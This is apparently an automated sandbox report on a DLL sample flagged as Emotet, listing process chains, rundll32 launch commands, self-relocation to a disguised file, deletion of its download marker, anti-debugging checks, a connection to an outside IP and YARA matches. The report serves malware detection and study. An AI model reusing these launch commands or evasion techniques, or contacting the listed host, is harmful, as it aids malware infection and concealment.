                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF1A3C7_2_04EF1A3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED8C097_2_04ED8C09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED1A0A7_2_04ED1A0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED4C007_2_04ED4C00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDE21C7_2_04EDE21C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDF41F7_2_04EDF41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE1C107_2_04EE1C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEBFE87_2_04EEBFE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF03F17_2_04EF03F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF25C37_2_04EF25C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDA3DF7_2_04EDA3DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE9DA17_2_04EE9DA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEB1B57_2_04EEB1B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE7BB27_2_04EE7BB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE43B37_2_04EE43B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE4D8D7_2_04EE4D8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED4F8E7_2_04ED4F8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EED99A7_2_04EED99A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEB3977_2_04EEB397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDFD917_2_04EDFD91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF11937_2_04EF1193
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE056A7_2_04EE056A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE1F6B7_2_04EE1F6B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE577E7_2_04EE577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEF14D7_2_04EEF14D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED33457_2_04ED3345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF13437_2_04EF1343
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED3F5C7_2_04ED3F5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDC1587_2_04EDC158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF292B7_2_04EF292B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED6B257_2_04ED6B25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED59237_2_04ED5923
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED23097_2_04ED2309
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED35027_2_04ED3502
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED251C7_2_04ED251C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEFD107_2_04EEFD10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1003F350 appears 44 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1003EE82 appears 50 times
                      Source: spZRMihlrkFGqYq1f.dllMetadefender: Detection: 42%
                      Source: spZRMihlrkFGqYq1f.dllReversingLabs: Detection: 56%
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvgJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@17/0@0/20
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003A742 _memset,GetDiskFreeSpaceA,GetLastError,3_2_1003A742
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE1B54 CreateToolhelp32Snapshot,7_2_04EE1B54
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000A0F4 __EH_prolog3_catch,FindResourceA,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,3_2_1000A0F4
                      Source: rundll32.exe, 00000004.00000002.710493956.0000000003151000.00000004.00000020.sdmpBinary or memory string: penSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBPA
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_CURSOR
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_BITMAP
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_ICON
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_MENU
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_DIALOG
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_STRING
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_ACCELERATOR
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_GROUP_ICON
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003F395 push ecx; ret 3_2_1003F3A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003EF21 push ecx; ret 3_2_1003EF34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D1229 push eax; retf 4_2_030D129A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D1229 push eax; retf 6_2_042D129A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED1229 push eax; retf 7_2_04ED129A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1004BC7A LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,3_2_1004BC7A
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: real checksum: 0xb4236 should be: 0xbc245
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gisJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000BD3C IsIconic,GetWindowPlacement,GetWindowRect,3_2_1000BD3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10022F30 GetParent,GetParent,IsIconic,GetParent,3_2_10022F30
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 4244Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.2 %
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003A2F3 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,3_2_1003A2F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002592C lstrlenA,FindFirstFileA,FindClose,3_2_1002592C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002F3E9 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_1002F3E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE1A80 FindFirstFileW,7_2_04EE1A80
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-21194
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-20904
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-21074
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: svchost.exe, 0000000C.00000002.841567859.000001A76FC8A000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.841663587.000001A76FCEC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10041482 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10041482
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1004BC7A LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,3_2_1004BC7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003D032 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,3_2_1003D032
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EDE10 mov eax, dword ptr fs:[00000030h]4_2_030EDE10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EDE10 mov eax, dword ptr fs:[00000030h]6_2_042EDE10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEDE10 mov eax, dword ptr fs:[00000030h]7_2_04EEDE10
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1004A43B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1004A43B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10041482 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10041482
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10039F21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10039F21

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.178.61.60 187Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1Jump to behavior
                      Source: rundll32.exe, 00000007.00000002.1231869859.00000000039C0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: rundll32.exe, 00000007.00000002.1231869859.00000000039C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: rundll32.exe, 00000007.00000002.1231869859.00000000039C0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: rundll32.exe, 00000007.00000002.1231869859.00000000039C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,3_2_100472AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,3_2_10026ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_10047C26
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_10046C52
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,3_2_1004E4F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,3_2_100474FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,3_2_1004A54C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_1004D563
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,3_2_1004E631
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,3_2_1004E66C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_1004E7A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,3_2_100477C3
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10048EDF GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_10048EDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10045F08 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,3_2_10045F08
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003D032 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,3_2_1003D032

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 7.2.rundll32.exe.5880000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56b0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4910000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3f80000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.59a0000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4880000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4880000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5a90000.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4a40000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5bd0000.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.46e0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.34d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56e0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5a90000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5970000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5ba0000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5ba0000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4710000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4f80000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ea0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4a40000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.41a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.46e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.42d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.58b0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ed0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4a70000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4040000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4040000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5880000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.30a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4630000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3fc0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.41a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56b0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.48e0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5810000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5810000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3380000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3f80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5840000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5970000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.48b0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.30a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.48e0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ea0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5600000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.30d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4f80000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5ac0000.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.1231555705.0000000003380000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232688117.0000000005A90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712245563.00000000046E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712289758.0000000004711000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232447127.0000000005810000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232307431.0000000005601000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1231756136.00000000034D1000.00000020.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232722292.0000000005AC1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232778778.0000000005BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232026757.0000000004EA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232814811.0000000005BD1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232471736.0000000005841000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232588764.0000000005970000.00000040.00000001.sdmp, type: MEMORY
